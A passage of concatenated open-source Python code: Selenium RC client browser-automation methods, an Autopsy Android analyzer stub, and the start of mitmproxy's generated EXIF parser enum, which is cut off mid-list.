notice the open window's name by using the Selenium openWindow command, using an empty (blank) url, like this: openWindow("", "myFunnyWindow"). 'windowID' is the JavaScript window ID of the window to select """ self.do_command("selectWindow", [windowID,]) def select_frame(self,locator): """ Selects a frame within the current window. (You may invoke this command multiple times to select nested frames.) To select the parent frame, use "relative=parent" as a locator; to select the top frame, use "relative=top". You can also select a frame by its 0-based index number; select the first frame with "index=0", or the third frame with "index=2". You may also use a DOM expression to identify the frame you want directly, like this: ``dom=frames["main"].frames["subframe"]`` 'locator' is an element locator identifying a frame or iframe """ self.do_command("selectFrame", [locator,]) def get_whether_this_frame_match_frame_expression(self,currentFrameString,target): """ Determine whether current/locator identify the frame containing this running code. This is useful in proxy injection mode, where this code runs in every browser frame and window, and sometimes the selenium server needs to identify the "current" frame. In this case, when the test calls selectFrame, this routine is called for each frame to figure out which one has been selected. The selected frame will return true, while all others will return false. 'currentFrameString' is starting frame 'target' is new frame (which might be relative to the current one) """ return self.get_boolean("getWhetherThisFrameMatchFrameExpression", [currentFrameString,target,]) def get_whether_this_window_match_window_expression(self,currentWindowString,target): """ Determine whether currentWindowString plus target identify the window containing this running code. This is useful in proxy injection mode, where this code runs in every browser frame and window, and sometimes the selenium server needs to identify the "current" window. In this case, when the test calls selectWindow, this routine is called for each window to figure out which one has been selected. The selected window will return true, while all others will return false. 'currentWindowString' is starting window 'target' is new window (which might be relative to the current one, e.g., "_parent") """ return self.get_boolean("getWhetherThisWindowMatchWindowExpression", [currentWindowString,target,]) def wait_for_pop_up(self,windowID,timeout): """ Waits for a popup window to appear and load up. 'windowID' is the JavaScript window "name" of the window that will appear (not the text of the title bar) 'timeout' is a timeout in milliseconds, after which the action will return with an error """ self.do_command("waitForPopUp", [windowID,timeout,]) def choose_cancel_on_next_confirmation(self): """ By default, Selenium's overridden window.confirm() function will return true, as if the user had manually clicked OK; after running this command, the next call to confirm() will return false, as if the user had clicked Cancel. Selenium will then resume using the default behavior for future confirmations, automatically returning true (OK) unless/until you explicitly call this command for each confirmation. """ self.do_command("chooseCancelOnNextConfirmation", []) def choose_ok_on_next_confirmation(self): """ Undo the effect of calling chooseCancelOnNextConfirmation. Note that Selenium's overridden window.confirm() function will normally automatically return true, as if the user had manually clicked OK, so you shouldn't need to use this command unless for some reason you need to change your mind prior to the next confirmation. After any confirmation, Selenium will resume using the default behavior for future confirmations, automatically returning true (OK) unless/until you explicitly call chooseCancelOnNextConfirmation for each confirmation. """ self.do_command("chooseOkOnNextConfirmation", []) def answer_on_next_prompt(self,answer): """ Instructs Selenium to return the specified answer string in response to the next JavaScript prompt [window.prompt()]. 'answer' is the answer to give in response to the prompt pop-up """ self.do_command("answerOnNextPrompt", [answer,]) def go_back(self): """ Simulates the user clicking the "back" button on their browser. """ self.do_command("goBack", []) def refresh(self): """ Simulates the user clicking the "Refresh" button on their browser. """ self.do_command("refresh", []) def close(self): """ Simulates the user clicking the "close" button in the titlebar of a popup window or tab. """ self.do_command("close", []) def is_alert_present(self): """ Has an alert occurred? This function never throws an exception """ return self.get_boolean("isAlertPresent", []) def is_prompt_present(self): """ Has a prompt occurred? This function never throws an exception """ return self.get_boolean("isPromptPresent", []) def is_confirmation_present(self): """ Has confirm() been called? This function never throws an exception """ return self.get_boolean("isConfirmationPresent", []) def get_alert(self): """ Retrieves the message of a JavaScript alert generated during the previous action, or fail if there were no alerts. Getting an alert has the same effect as manually clicking OK. If an alert is generated but you do not get/verify it, the next Selenium action will fail. NOTE: under Selenium, JavaScript alerts will NOT pop up a visible alert dialog. NOTE: Selenium does NOT support JavaScript alerts that are generated in a page's onload() event handler. In this case a visible dialog WILL be generated and Selenium will hang until someone manually clicks OK. """ return self.get_string("getAlert", []) def get_confirmation(self): """ Retrieves the message of a JavaScript confirmation dialog generated during the previous action. By default, the confirm function will return true, having the same effect as manually clicking OK. This can be changed by prior execution of the chooseCancelOnNextConfirmation command. If an confirmation is generated but you do not get/verify it, the next Selenium action will fail. NOTE: under Selenium, JavaScript confirmations will NOT pop up a visible dialog. NOTE: Selenium does NOT support JavaScript confirmations that are generated in a page's onload() event handler. In this case a visible dialog WILL be generated and Selenium will hang until you manually click OK. """ return self.get_string("getConfirmation", []) def get_prompt(self): """ Retrieves the message of a JavaScript question prompt dialog generated during the previous action. Successful handling of the prompt requires prior execution of the answerOnNextPrompt command. If a prompt is generated but you do not get/verify it, the next Selenium action will fail. NOTE: under Selenium, JavaScript prompts will NOT pop up a visible dialog. NOTE: Selenium does NOT support JavaScript prompts that are generated in a page's onload() event handler. In this case a visible dialog WILL be generated and Selenium will hang until someone manually clicks OK. """ return self.get_string("getPrompt", []) def get_location(self): """ Gets the absolute URL of the current page. """ return self.get_string("getLocation", []) def get_title(self): """ Gets the title of the current page. """ return self.get_string("getTitle", []) def get_body_text(self): """ Gets the entire text of the page. """ return self.get_string("getBodyText", []) def get_value(self,locator): """ Gets the (whitespace-trimmed) value of an input field (or anything else with a value parameter). For checkbox/radio elements, the value will be "on" or "off" depending on whether the element is checked or not. 'locator' is an element locator """ return self.get_string("getValue", [locator,]) def get_text(self,locator): """ Gets the text of an element. This works for any element that contains text. This command uses either the textContent (Mozilla-like browsers) or the innerText (IE-like browsers) of the element, which is the rendered text shown to the user. 'locator' is an element locator """ return self.get_string("getText", [locator,]) def highlight(self,locator): """ Briefly changes the backgroundColor of the specified element yellow. Useful for debugging. 'locator' is an element locator """ self.do_command("highlight", [locator,]) def get_eval(self,script): """ Gets the result of evaluating the specified JavaScript snippet. The snippet may have multiple lines, but only the result of the last line will be returned. Note that, by default, the snippet will run in the context of the "selenium" object itself, so ``this`` will refer to the Selenium object. Use ``window`` to refer to the window of your application, e.g. ``window.document.getElementById('foo')`` If you need to use a locator to refer to a single element in your application page, you can use ``this.browserbot.findElement("id=foo")`` where "id=foo" is your locator. 'script' is the JavaScript snippet to run """ return self.get_string("getEval", [script,]) def is_checked(self,locator): """ Gets whether a toggle-button (checkbox/radio) is checked. Fails if the specified element doesn't exist or isn't a toggle-button. 'locator' is an element locator pointing to a checkbox or radio button """ return self.get_boolean("isChecked", [locator,]) def get_table(self,tableCellAddress): """ Gets the text from a cell of a table. The cellAddress syntax tableLocator.row.column, where row and column start at 0. 'tableCellAddress' is a cell address, e.g. "foo.1.4" """ return self.get_string("getTable", [tableCellAddress,]) def get_selected_labels(self,selectLocator): """ Gets all option labels (visible text) for selected options in the specified select or multi-select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedLabels", [selectLocator,]) def get_selected_label(self,selectLocator): """ Gets option label (visible text) for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedLabel", [selectLocator,]) def get_selected_values(self,selectLocator): """ Gets all option values (value attributes) for selected options in the specified select or multi-select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedValues", [selectLocator,]) def get_selected_value(self,selectLocator): """ Gets option value (value attribute) for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedValue", [selectLocator,]) def get_selected_indexes(self,selectLocator): """ Gets all option indexes (option number, starting at 0) for selected options in the specified select or multi-select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedIndexes", [selectLocator,]) def get_selected_index(self,selectLocator): """ Gets option index (option number, starting at 0) for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedIndex", [selectLocator,]) def get_selected_ids(self,selectLocator): """ Gets all option element IDs for selected options in the specified select or multi-select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedIds", [selectLocator,]) def get_selected_id(self,selectLocator): """ Gets option element ID for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedId", [selectLocator,]) def is_something_selected(self,selectLocator): """ Determines whether some option in a drop-down menu is selected. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_boolean("isSomethingSelected", [selectLocator,]) def get_select_options(self,selectLocator): """ Gets all option labels in the specified select drop-down. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectOptions", [selectLocator,]) def get_attribute(self,attributeLocator): """ Gets the value of an element attribute. The value of the attribute may differ across browsers (this is the case for the "style" attribute, for example). 'attributeLocator' is an element locator followed by an @ sign and then the name of the attribute, e.g. "foo@bar" """ return self.get_string("getAttribute", [attributeLocator,]) def is_text_present(self,pattern): """ Verifies that the specified text pattern appears somewhere on the rendered page shown to the user. 'pattern' is a pattern to match with the text of the page """ return self.get_boolean("isTextPresent", [pattern,]) def is_element_present(self,locator): """ Verifies that the specified element is somewhere on the page. 'locator' is an element locator """ return self.get_boolean("isElementPresent", [locator,]) def is_visible(self,locator): """ Determines if the specified element is visible. An element can be rendered invisible by setting the CSS "visibility" property to "hidden", or the "display" property to "none", either for the element itself or one if its ancestors. This method will fail if the element is not present. 'locator' is an element locator """ return self.get_boolean("isVisible", [locator,]) def is_editable(self,locator): """ Determines whether the specified input element is editable, ie hasn't been disabled. This method will fail if the specified element isn't an input element. 'locator' is an element locator """ return self.get_boolean("isEditable", [locator,]) def get_all_buttons(self): """ Returns the IDs of all buttons on the page. If a given button has no ID, it will appear as "" in this array. """ return self.get_string_array("getAllButtons", []) def get_all_links(self): """ Returns the IDs of all links on the page. If a given link has no ID, it will appear as "" in this array. """ return self.get_string_array("getAllLinks", []) def get_all_fields(self): """ Returns the IDs of all input fields on the page. If a given field has no ID, it will appear as "" in this array. """ return self.get_string_array("getAllFields", []) def get_attribute_from_all_windows(self,attributeName): """ Returns every instance of some attribute from all known windows. 'attributeName' is name of an attribute on the windows """ return self.get_string_array("getAttributeFromAllWindows", [attributeName,]) def dragdrop(self,locator,movementsString): """ deprecated - use dragAndDrop instead 'locator' is an element locator 'movementsString' is offset in pixels from the current location to which the element should be moved, e.g., "+70,-300" """ self.do_command("dragdrop", [locator,movementsString,]) def set_mouse_speed(self,pixels): """ Configure the number of pixels between "mousemove" events during dragAndDrop commands (default=10). Setting this value to 0 means that we'll send a "mousemove" event to every single pixel in between the start location and the end location; that can be very slow, and may cause some browsers to force the JavaScript to timeout. If the mouse speed is greater than the distance between the two dragged objects, we'll just send one "mousemove" at the start location and then one final one at the end location. 'pixels' is the number of pixels between "mousemove" events """ self.do_command("setMouseSpeed", [pixels,]) def get_mouse_speed(self): """ Returns the number of pixels between "mousemove" events during dragAndDrop commands (default=10). """ return self.get_number("getMouseSpeed", []) def drag_and_drop(self,locator,movementsString): """ Drags an element a certain distance and then drops it 'locator' is an element locator 'movementsString' is offset in pixels from the current location to which the element should be moved, e.g., "+70,-300" """ self.do_command("dragAndDrop", [locator,movementsString,]) def drag_and_drop_to_object(self,locatorOfObjectToBeDragged,locatorOfDragDestinationObject): """ Drags an element and drops it on another element 'locatorOfObjectToBeDragged' is an element to be dragged 'locatorOfDragDestinationObject' is an element whose location (i.e., whose center-most pixel) will be the point where locatorOfObjectToBeDragged is dropped """ self.do_command("dragAndDropToObject", [locatorOfObjectToBeDragged,locatorOfDragDestinationObject,]) def window_focus(self): """ Gives focus to the currently selected window """ self.do_command("windowFocus", []) def window_maximize(self): """ Resize currently selected window to take up the entire screen """ self.do_command("windowMaximize", []) def get_all_window_ids(self): """ Returns the IDs of all windows that the browser knows about. """ return self.get_string_array("getAllWindowIds", []) def get_all_window_names(self): """ Returns the names of all windows that the browser knows about. """ return self.get_string_array("getAllWindowNames", []) def get_all_window_titles(self): """ Returns the titles of all windows that the browser knows about. """ return self.get_string_array("getAllWindowTitles", []) def get_html_source(self): """ Returns the entire HTML source between the opening and closing "html" tags. """ return self.get_string("getHtmlSource", []) def set_cursor_position(self,locator,position): """ Moves the text cursor to the specified position in the given input element or textarea. This method will fail if the specified element isn't an input element or textarea. 'locator' is an element locator pointing to an input element or textarea 'position' is the numerical position of the cursor in the field; position should be 0 to move the position to the beginning of the field. You can also set the cursor to -1 to move it to the end of the field. """ self.do_command("setCursorPosition", [locator,position,]) def get_element_index(self,locator): """ Get the relative index of an element to its parent (starting from 0). The comment node and empty text node will be ignored. 'locator' is an element locator pointing to an element """ return self.get_number("getElementIndex", [locator,]) def is_ordered(self,locator1,locator2): """ Check if these two elements have same parent and are ordered siblings in the DOM. Two same elements will not be considered ordered. 'locator1' is an element locator pointing to the first element 'locator2' is an element locator pointing to the second element """ return self.get_boolean("isOrdered", [locator1,locator2,]) def get_element_position_left(self,locator): """ Retrieves the horizontal position of an element 'locator' is an element locator pointing to an element OR an element itself """ return self.get_number("getElementPositionLeft", [locator,]) def get_element_position_top(self,locator): """ Retrieves the vertical position of an element 'locator' is an element locator pointing to an element OR an element itself """ return self.get_number("getElementPositionTop", [locator,]) def get_element_width(self,locator): """ Retrieves the width of an element 'locator' is an element locator pointing to an element """ return self.get_number("getElementWidth", [locator,]) def get_element_height(self,locator): """ Retrieves the height of an element 'locator' is an element locator pointing to an element """ return self.get_number("getElementHeight", [locator,]) def get_cursor_position(self,locator): """ Retrieves the text cursor position in the given input element or textarea; beware, this may not work perfectly on all browsers. Specifically, if the cursor/selection has been cleared by JavaScript, this command will tend to return the position of the last location of the cursor, even though the cursor is now gone from the page. This is filed as SEL-243. This method will fail if the specified element isn't an input element or textarea, or there is no cursor in the element. 'locator' is an element locator pointing to an input element or textarea """ return self.get_number("getCursorPosition", [locator,]) def get_expression(self,expression): """ Returns the specified expression. This is useful because of JavaScript preprocessing. It is used to generate commands like assertExpression and waitForExpression. 'expression' is the value to return """ return self.get_string("getExpression", [expression,]) def get_xpath_count(self,xpath): """ Returns the number of nodes that match the specified xpath, eg. "//table" would give the number of tables. 'xpath' is the xpath expression to evaluate. do NOT wrap this expression in a 'count()' function; we will do that for you. """ return self.get_number("getXpathCount", [xpath,]) def assign_id(self,locator,identifier): """ Temporarily sets the "id" attribute of the specified element, so you can locate it in the future using its ID rather than a slow/complicated XPath. This ID will disappear once the page is reloaded. 'locator' is an element locator pointing to an element 'identifier' is a string to be used as the ID of the specified element """ self.do_command("assignId", [locator,identifier,]) def allow_native_xpath(self,allow): """ Specifies whether Selenium should use the native in-browser implementation of XPath (if any native version is available); if you pass "false" to this function, we will always use our pure-JavaScript xpath library. Using the pure-JS xpath library can improve the consistency of xpath element locators between different browser vendors, but the pure-JS version is much slower than the native implementations. 'allow' is boolean, true means we'll prefer to use native XPath; false means we'll only use JS XPath """ self.do_command("allowNativeXpath", [allow,]) def ignore_attributes_without_value(self,ignore): """ Specifies whether Selenium will ignore xpath attributes that have no value, i.e. are the empty string, when using the non-native xpath evaluation engine. You'd want to do this for performance reasons in IE. However, this could break certain xpaths, for example an xpath that looks for an attribute whose value is NOT the empty string. The hope is that such xpaths are relatively rare, but the user should have the option of using them. Note that this only influences xpath evaluation when using the ajaxslt engine (i.e. not "javascript-xpath"). 'ignore' is boolean, true means we'll ignore attributes without value at the expense of xpath "correctness"; false means we'll sacrifice speed for correctness. """ self.do_command("ignoreAttributesWithoutValue", [ignore,]) def wait_for_condition(self,script,timeout): """ Runs the specified JavaScript snippet repeatedly until it evaluates to "true". The snippet may have multiple lines, but only the result of the last line will be considered. Note that, by default, the snippet will be run in the runner's test window, not in the window of your application. To get the window of your application, you can use the JavaScript snippet ``selenium.browserbot.getCurrentWindow()``, and then run your JavaScript in there 'script' is the JavaScript snippet to run 'timeout' is a timeout in milliseconds, after which this command will return with an error """ self.do_command("waitForCondition", [script,timeout,]) def set_timeout(self,timeout): """ Specifies the amount of time that Selenium will wait for actions to complete. Actions that require waiting include "open" and the "waitFor\*" actions. The default timeout is 30 seconds. 'timeout' is a timeout in milliseconds, after which the action will return with an error """ self.do_command("setTimeout", [timeout,]) def wait_for_page_to_load(self,timeout): """ Waits for a new page to load. You can use this command instead of the "AndWait" suffixes, "clickAndWait", "selectAndWait", "typeAndWait" etc. (which are only available in the JS API). Selenium constantly keeps track of new pages loading, and sets a "newPageLoaded" flag when it first notices a page load. Running any other Selenium command after turns the flag to false. Hence, if you want to wait for a page to load, you must wait immediately after a Selenium command that caused a page-load. 'timeout' is a timeout in milliseconds, after which this command will return with an error """ self.do_command("waitForPageToLoad", [timeout,]) def wait_for_frame_to_load(self,frameAddress,timeout): """ Waits for a new frame to load. Selenium constantly keeps track of new pages and frames loading, and sets a "newPageLoaded" flag when it first notices a page load. See waitForPageToLoad for more information. 'frameAddress' is FrameAddress from the server side 'timeout' is a timeout in milliseconds, after which this command will return with an error """ self.do_command("waitForFrameToLoad", [frameAddress,timeout,]) def get_cookie(self): """ Return all cookies of the current page under test. """ return self.get_string("getCookie", []) def get_cookie_by_name(self,name): """ Returns the value of the cookie with the specified name, or throws an error if the cookie is not present. 'name' is the name of the cookie """ return self.get_string("getCookieByName", [name,]) def is_cookie_present(self,name): """ Returns true if a cookie with the specified name is present, or false otherwise. 'name' is the name of the cookie """ return self.get_boolean("isCookiePresent", [name,]) def create_cookie(self,nameValuePair,optionsString): """ Create a new cookie whose path and domain are same with those of current page under test, unless you specified a path for this cookie explicitly. 'nameValuePair' is name and value of the cookie in a format "name=value" 'optionsString' is options for the cookie. Currently supported options include 'path', 'max_age' and 'domain'. the optionsString's format is "path=/path/, max_age=60, domain=.foo.com". The order of options are irrelevant, the unit of the value of 'max_age' is second. Note that specifying a domain that isn't a subset of the current domain will usually fail. """ self.do_command("createCookie", [nameValuePair,optionsString,]) def delete_cookie(self,name,optionsString): """ Delete a named cookie with specified path and domain. Be careful; to delete a cookie, you need to delete it using the exact same path and domain that were used to create the cookie. If the path is wrong, or the domain is wrong, the cookie simply won't be deleted. Also note that specifying a domain that isn't a subset of the current domain will usually fail. Since there's no way to discover at runtime the original path and domain of a given cookie, we've added an option called 'recurse' to try all sub-domains of the current domain with all paths that are a subset of the current path. Beware; this option can be slow. In big-O notation, it operates in O(n\*m) time, where n is the number of dots in the domain name and m is the number of slashes in the path. 'name' is the name of the cookie to be deleted 'optionsString' is options for the cookie. Currently supported options include 'path', 'domain' and 'recurse.' The optionsString's format is "path=/path/, domain=.foo.com, recurse=true". The order of options are irrelevant. Note that specifying a domain that isn't a subset of the current domain will usually fail. """ self.do_command("deleteCookie", [name,optionsString,]) def delete_all_visible_cookies(self): """ Calls deleteCookie with recurse=true on all cookies visible to the current page. As noted on the documentation for deleteCookie, recurse=true can be much slower than simply deleting the cookies using a known domain/path. """ self.do_command("deleteAllVisibleCookies", []) def set_browser_log_level(self,logLevel): """ Sets the threshold for browser-side logging messages; log messages beneath this threshold will be discarded. Valid logLevel strings are: "debug", "info", "warn", "error" or "off". To see the browser logs, you need to either show the log window in GUI mode, or enable browser-side logging in Selenium RC. 'logLevel' is one of the following: "debug", "info", "warn", "error" or "off" """ self.do_command("setBrowserLogLevel", [logLevel,]) def run_script(self,script): """ Creates a new "script" tag in the body of the current test window, and adds the specified text into the body of the command. Scripts run in this way can often be debugged more easily than scripts executed using Selenium's "getEval" command. Beware that JS exceptions thrown in these script tags aren't managed by Selenium, so you should probably wrap your script in try/catch blocks if there is any chance that the script will throw an exception. 'script' is the JavaScript snippet to run """ self.do_command("runScript", [script,]) def add_location_strategy(self,strategyName,functionDefinition): """ Defines a new function for Selenium to locate elements on the page. For example, if you define the strategy "foo", and someone runs click("foo=blah"), we'll run your function, passing you the string "blah", and click on the element that your function returns, or throw an "Element not found" error if your function returns null. We'll pass three arguments to your function: * locator: the string the user passed in * inWindow: the currently selected window * inDocument: the currently selected document The function must return null if the element can't be found. 'strategyName' is the name of the strategy to define; this should use only letters [a-zA-Z] with no spaces or other punctuation. 'functionDefinition' is a string defining the body of a function in JavaScript. For example: ``return inDocument.getElementById(locator);`` """ self.do_command("addLocationStrategy", [strategyName,functionDefinition,]) def capture_entire_page_screenshot(self,filename): """ Saves the entire contents of the current window canvas to a PNG file. Currently this only works in Mozilla and when running in chrome mode. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Implementation mostly borrowed from the Screengrab! Firefox extension. Please see http://www.screengrab.org for details. 'filename' is the path to the file to persist the screenshot as. No filename extension will be appended by default. Directories will not be created if they do not exist, and an exception will be thrown, possibly by native code. """ self.do_command("captureEntirePageScreenshot", [filename,]) def set_context(self,context): """ Writes a message to the status bar and adds a note to the browser-side log. 'context' is the message to be sent to the browser """ self.do_command("setContext", [context,]) def attach_file(self,fieldLocator,fileLocator): """ Sets a file input (upload) field to the file listed in fileLocator 'fieldLocator' is an element locator 'fileLocator' is a URL pointing to the specified file. Before the file can be set in the input field (fieldLocator), Selenium RC may need to transfer the file to the local machine before attaching the file in a web page form. This is common in selenium grid configurations where the RC server driving the browser is not the same machine that started the test. Supported Browsers: Firefox ("\*chrome") only. """ self.do_command("attachFile", [fieldLocator,fileLocator,]) def capture_screenshot(self,filename): """ Captures a PNG screenshot to the specified file. 'filename' is the absolute path to the file to be written, e.g. "c:\blah\screenshot.png" """ self.do_command("captureScreenshot", [filename,]) def shut_down_selenium_server(self): """ Kills the running Selenium Server and all browser sessions. After you run this command, you will no longer be able to send commands to the server; you can't remotely start the server once it has been stopped. Normally you should prefer to run the "stop" command, which terminates the current browser session, rather than shutting down the entire server. """ self.do_command("shutDownSeleniumServer", []) def key_down_native(self,keycode): """ Simulates a user pressing a key (without releasing it yet) by sending a native operating system keystroke. This function uses the java.awt.Robot class to send a keystroke; this more accurately simulates typing a key on the keyboard. It does not honor settings from the shiftKeyDown, controlKeyDown, altKeyDown and metaKeyDown commands, and does not target any particular HTML element. To send a keystroke to a particular element, focus on the element first before running this command. 'keycode' is an integer keycode number corresponding to a java.awt.event.KeyEvent; note that Java keycodes are NOT the same thing as JavaScript keycodes! """ self.do_command("keyDownNative", [keycode,]) def key_up_native(self,keycode): """ Simulates a user releasing a key by sending a native operating system keystroke. This function uses the java.awt.Robot class to send a keystroke; this more accurately simulates typing a key on the keyboard. It does not honor settings from the shiftKeyDown, controlKeyDown, altKeyDown and metaKeyDown commands, and does not target any particular HTML element. To send a keystroke to a particular element, focus on the element first before running this command. 'keycode' is an integer keycode number corresponding to a java.awt.event.KeyEvent; note that Java keycodes are NOT the same thing as JavaScript keycodes! """ self.do_command("keyUpNative", [keycode,]) def key_press_native(self,keycode): """ Simulates a user pressing and releasing a key by sending a native operating system keystroke. This function uses the java.awt.Robot class to send a keystroke; this more accurately simulates typing a key on the keyboard. It does not honor settings from the shiftKeyDown, controlKeyDown, altKeyDown and metaKeyDown commands, and does not target any particular HTML element. To send a keystroke to a particular element, focus on the element first before running this command. 'keycode' is an integer keycode number corresponding to a java.awt.event.KeyEvent; note that Java keycodes are NOT the same thing as JavaScript keycodes! """ self.do_command("keyPressNative", [keycode,])
narfindustries/autopsy
refs/heads/develop
InternalPythonModules/android/general.py
4
""" Autopsy Forensic Browser Copyright 2016 Basis Technology Corp. Contact: carrier <at> sleuthkit <dot> org Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ MODULE_NAME = "Android Analyzer" """ A parent class of the analyzers """ class AndroidComponentAnalyzer: # The Analyzer should implement this method def analyze(self, dataSource, fileManager, context): raise NotImplementedError
Kriechi/mitmproxy
refs/heads/main
mitmproxy/contrib/kaitaistruct/exif_be.py
4
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild from pkg_resources import parse_version from kaitaistruct import __version__ as ks_version, KaitaiStruct, KaitaiStream, BytesIO from enum import Enum if parse_version(ks_version) < parse_version('0.7'): raise Exception("Incompatible Kaitai Struct Python API: 0.7 or later is required, but you have %s" % (ks_version)) class ExifBe(KaitaiStruct): def __init__(self, _io, _parent=None, _root=None): self._io = _io self._parent = _parent self._root = _root if _root else self self._read() def _read(self): self.version = self._io.read_u2be() self.ifd0_ofs = self._io.read_u4be() class Ifd(KaitaiStruct): def __init__(self, _io, _parent=None, _root=None): self._io = _io self._parent = _parent self._root = _root if _root else self self._read() def _read(self): self.num_fields = self._io.read_u2be() self.fields = [None] * (self.num_fields) for i in range(self.num_fields): self.fields[i] = self._root.IfdField(self._io, self, self._root) self.next_ifd_ofs = self._io.read_u4be() @property def next_ifd(self): if hasattr(self, '_m_next_ifd'): return self._m_next_ifd if hasattr(self, '_m_next_ifd') else None if self.next_ifd_ofs != 0: _pos = self._io.pos() self._io.seek(self.next_ifd_ofs) self._m_next_ifd = self._root.Ifd(self._io, self, self._root) self._io.seek(_pos) return self._m_next_ifd if hasattr(self, '_m_next_ifd') else None class IfdField(KaitaiStruct): class FieldTypeEnum(Enum): byte = 1 ascii_string = 2 word = 3 dword = 4 rational = 5 undefined = 7 slong = 9 srational = 10 class TagEnum(Enum): image_width = 256 image_height = 257 bits_per_sample = 258 compression = 259 photometric_interpretation = 262 thresholding = 263 cell_width = 264 cell_length = 265 fill_order = 266 document_name = 269 image_description = 270 make = 271 model = 272 strip_offsets = 273 orientation = 274 samples_per_pixel = 277 rows_per_strip = 278 strip_byte_counts = 279 min_sample_value = 280 max_sample_value = 281 x_resolution = 282 y_resolution = 283 planar_configuration = 284 page_name = 285 x_position = 286 y_position = 287 free_offsets = 288 free_byte_counts = 289 gray_response_unit = 290 gray_response_curve = 291 t4_options = 292 t6_options = 293 resolution_unit = 296 page_number = 297 color_response_unit = 300 transfer_function = 301 software = 305 modify_date = 306 artist = 315 host_computer = 316 predictor = 317 white_point = 318 primary_chromaticities = 319 color_map = 320 halftone_hints = 321 tile_width = 322 tile_length = 323 tile_offsets = 324 tile_byte_counts = 325 bad_fax_lines = 326 clean_fax_data = 327 consecutive_bad_fax_lines = 328 sub_ifd = 330 ink_set = 332 ink_names = 333 numberof_inks = 334 dot_range = 336 target_printer = 337 extra_samples = 338 sample_format = 339 s_min_sample_value = 340 s_max_sample_value = 341 transfer_range = 342 clip_path = 343 x_clip_path_units = 344 y_clip_path_units = 345 indexed = 346 jpeg_tables = 347 opi_proxy = 351 global_parameters_ifd = 400 profile_type = 401 fax_profile = 402 coding_methods = 403 version_year = 404 mode_number = 405 decode = 433 default_image_color = 434 t82_options = 435 jpeg_tables2 = 437 jpeg_proc = 512 thumbnail_offset = 513 thumbnail_length = 514 jpeg_restart_interval = 515 jpeg_lossless_predictors = 517 jpeg_point_transforms = 518 jpegq_tables = 519 jpegdc_tables = 520 jpegac_tables = 521 y_cb_cr_coefficients = 529 y_cb_cr_sub_sampling = 530 y_cb_cr_positioning = 531 reference_black_white = 532 strip_row_counts = 559 application_notes = 700 uspto_miscellaneous = 999 related_image_file_format = 4096 related_image_width = 4097 related_image_height = 4098 rating = 18246 xp_dip_xml = 18247 stitch_info = 18248 rating_percent = 18249 sony_raw_file_type = 28672 light_falloff_params = 28722 chromatic_aberration_corr_params = 28725 distortion_corr_params = 28727 image_id = 32781 wang_tag1 = 32931 wang_annotation = 32932 wang_tag3 = 32933 wang_tag4 = 32934 image_reference_points = 32953 region_xform_tack_point = 32954 warp_quadrilateral = 32955 affine_transform_mat = 32956 matteing = 32995 data_type = 32996 image_depth = 32997 tile_depth = 32998 image_full_width = 33300 image_full_height = 33301 texture_format = 33302 wrap_modes = 33303 fov_cot = 33304 matrix_world_to_screen = 33305 matrix_world_to_camera = 33306 model2 = 33405 cfa_repeat_pattern_dim = 33421 cfa_pattern2 = 33422 battery_level = 33423 kodak_ifd = 33424 copyright = 33432 exposure_time = 33434 f_number = 33437 md_file_tag = 33445 md_scale_pixel = 33446 md_color_table = 33447 md_lab_name = 33448 md_sample_info = 33449 md_prep_date = 33450 md_prep_time = 33451 md_file_units = 33452 pixel_scale = 33550 advent_scale = 33589 advent_revision = 33590 uic1_tag = 33628 uic2_tag = 33629 uic3_tag = 33630 uic4_tag = 33631 iptc_naa = 33723 intergraph_packet_data = 33918 intergraph_flag_registers = 33919 intergraph_matrix = 33920 ingr_reserved = 33921 model_tie_point = 33922 site = 34016 color_sequence = 34017 it8_header = 34018 raster_padding = 34019 bits_per_run_length = 34020 bits_per_extended_run_length = 34021 color_table = 34022 image_color_indicator = 34023 background_color_indicator = 34024 image_color_value = 34025 background_color_value = 34026 pixel_intensity_range = 34027 transparency_indicator = 34028 color_characterization = 34029 hc_usage = 34030 trap_indicator = 34031 cmyk_equivalent = 34032 sem_info = 34118 afcp_iptc = 34152 pixel_magic_jbig_options = 34232 jpl_carto_ifd = 34263 model_transform = 34264 wb_grgb_levels = 34306 leaf_data = 34310 photoshop_settings = 34377 exif_offset = 34665 icc_profile = 34675 tiff_fx_extensions = 34687 multi_profiles = 34688 shared_data = 34689 t88_options = 34690 image_layer = 34732 geo_tiff_directory = 34735 geo_tiff_double_params = 34736 geo_tiff_ascii_params = 34737 jbig_options = 34750 exposure_program = 34850 spectral_sensitivity = 34852 gps_info = 34853 iso = 34855 opto_electric_conv_factor = 34856 interlace = 34857 time_zone_offset = 34858 self_timer_mode = 34859 sensitivity_type = 34864 standard_output_sensitivity = 34865 recommended_exposure_index = 34866 iso_speed = 34867 iso_speed_latitudeyyy = 34868 iso_speed_latitudezzz = 34869 fax_recv_params = 34908 fax_sub_address = 34909 fax_recv_time = 34910 fedex_edr = 34929 leaf_sub_ifd = 34954 exif_version = 36864 date_time_original = 36867 create_date = 36868 google_plus_upload_code = 36873 offset_time = 36880 offset_time_original = 36881 offset_time_digitized = 36882 components_configuration = 37121 compressed_bits_per_pixel = 37122 shutter_speed_value = 37377 aperture_value = 37378 brightness_value = 37379 exposure_compensation = 37380 max_aperture_value = 37381 subject_distance = 37382 metering_mode = 37383 light_source = 37384 flash = 37385 focal_length = 37386 flash_energy = 37387 spatial_frequency_response = 